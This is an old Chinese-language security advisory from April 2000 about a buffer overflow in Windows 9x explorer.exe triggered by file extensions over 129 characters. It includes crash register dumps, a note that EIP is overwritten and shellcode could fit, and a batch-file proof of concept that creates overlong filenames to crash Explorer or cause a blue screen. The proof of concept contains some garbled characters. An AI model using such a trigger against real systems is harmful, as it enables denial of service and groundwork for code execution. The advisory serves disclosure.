win9x,SE的explorer.exe处理长文件扩展名漏洞发布时间:2000-04-21 更新时间:2000-04-21 严重程度:中 威胁程度:普通用户访问权限 错误类型:输入验证错误 利用方式:客户机模式 受影响系统 WinNT详细描述 当微软的explorer尝试处理大于129字符文件后缀名时,将 出现缓冲溢出,并且将会出现下面的显示: EXPLORER caused an invalid page fault in module <unknown> at 0000:61616161. Registers: EAX=61616161 CS=0187 EIP=61616161 EFLGS=00010246 EBX=80070032 SS=018f ESP=01a1d8fc EBP=61616161 ECX=c16b6f10 DS=018f ESI=01d0bd3c FS=5047 EDX=81724974 ES=018f EDI=7fcbd320 GS=0000 Bytes at CS:EIP: Stack dump: 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 61616161 你从上面就可以看到EIP被覆盖了,这表示我们可以执行代 码。我们可以用247+129+118字节来存储一些SHELL代码。 测试代码 你可以编辑下面的一段.bat文件: ---- cut here echo This will create a file that when clicked upon in windows echo explorer or any other program that calls explorer.exe for echo file management will cause a buffer overflow. dir *.* > _??-----Buffer overflow----------- aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aa echo This will cause a Blue screen of death echo Just to show you it is possible to execute remote code. echo (all it does is overwrite the return adress with a false one.) dir *.* > _??-----Blue-screen-of-death------ aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa12345678怉 AAAAAAAAA --- cut here 此程序如果夹带在EUDORA中作为附件,将出现下面的提示: EUDORA caused an invalid page fault in module EUDORA.EXE at 0187:00428b05. Registers: EAX=007f0394 CS=0187 EIP=00428b05 EFLGS=00010206 EBX=00000000 SS=018f ESP=007eff88 EBP=007f0764 ECX=006a305c DS=018f ESI=007f07a8 FS=582f EDX=007eff8c ES=018f EDI=8173b024 GS=0000 Bytes at CS:EIP: 56 50 51 52 ff 15 50 9f 63 00 8b 15 80 2c 6b 00 Stack dump: 解决方案 暂无 相关信息 |
